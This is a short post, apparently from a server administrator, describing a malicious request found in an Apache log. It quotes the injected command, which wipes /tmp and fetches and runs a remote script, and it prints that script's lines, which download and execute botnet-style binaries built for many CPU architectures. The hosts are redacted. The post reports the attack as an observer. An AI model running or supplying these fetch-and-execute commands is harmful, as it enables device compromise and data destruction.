Saw a line like this pop up in the Apache log on my public-facing server from yesterday:

"GET /shell?cd+/tmp;rm+-rf+*;wget+ «redacted»/jaws;sh+/tmp/jaws"

I checked, and the file it is trying to fetch and execute still exists. It consists of about a dozen lines, all of this form:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget «redacted»/z0r0.«ext»; curl -O «redacted»/z0r0.«ext»; cat z0r0.«ext» >zeros6x; chmod +x *; ./zeros6x jaws.exploit

all differing only in «ext», with values like “mips” and “mpsl” and “ppc”, “arm”, “arm5”, “arm6”, “arm7”, even “m68k”, plus of course “x86” and “i686”.